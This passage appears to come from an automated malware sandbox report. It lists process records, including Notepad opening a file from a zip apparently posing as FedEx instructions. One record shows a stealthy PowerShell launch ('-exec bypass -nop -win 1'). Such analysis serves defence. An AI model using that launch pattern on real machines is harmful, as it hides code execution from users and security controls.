            Wow64 process (32bit):false
            Commandline:powershell.exe -exec bypass -nop -win 1 -
            Imagebase:0x7ff711290000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:21
            Start time:13:36:18
            Start date:25/10/2024
            Path:C:\Windows\System32\OpenWith.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\OpenWith.exe -Embedding
            Imagebase:0x7ff6ec760000
            File size:123'984 bytes
            MD5 hash:E4A834784FA08C17D47A1E72429C5109
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:22
            Start time:13:36:27
            Start date:25/10/2024
            Path:C:\Windows\System32\OpenWith.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\OpenWith.exe -Embedding
            Imagebase:0x7ff772470000
            File size:123'984 bytes
            MD5 hash:E4A834784FA08C17D47A1E72429C5109
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:23
            Start time:13:36:36
            Start date:25/10/2024
            Path:C:\Windows\System32\notepad.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Local\Temp\Temp1_VertusinstruccionesFedEX_66521.zip\-
            Imagebase:0x7ff79f750000
            File size:201'216 bytes
            MD5 hash:27F71B12CB585541885A31BE22F61C83
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Has exited:false

            No disassembly